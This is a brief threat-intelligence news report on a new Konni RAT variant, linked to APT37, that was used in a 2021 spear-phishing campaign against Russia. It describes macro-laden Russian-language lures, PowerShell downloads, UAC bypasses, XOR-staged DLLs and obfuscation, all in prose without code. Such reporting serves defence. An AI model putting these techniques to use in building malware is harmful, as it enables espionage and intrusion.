Files packaged with Excel-DNA from which a dll containing 2 urls pointing to Discord is extracted. These download data files and encode them with XOR creating additional DLLs, which initiate the malware infection.
Malwarebytes: A new variant of Konni malware has been used to target Russia
New variant of Konni malware has been used to target Russia. It has been discovered by Malwarebytes cybersecurity experts. It was first observed in the wild in 2014 and has been potentially linked to the North Korean APT group APT37. In late July 2021, researchers detected an ongoing spear phishing campaign: it exploits two documents written in Russian language and weaponized with the same malicious macro. One of the lures is about the trade and economic issues between Russia and the Korean Peninsula. The other one is about a meeting of the intergovernmental Russian-Mongolian commission. Both of them spread the RAT.
The new Konni variant shared by the Malware Hunter JAMESWT
The differences between the new and the old campaigns according to the cybersecurity experts
However, according the cybersecurity experts, there are differences between the new and the old cyber espionage APT campaigns:
- The macros are different. Previously the actor used TextBoxes to store its data while today the content has been base64 encoded within the document content;
- Now Powershell and URLMON API calls are used to download the cab file while in the old campaign it used certutil to download the cab file;
- The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique;
- The new variant of Konni RAT is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration.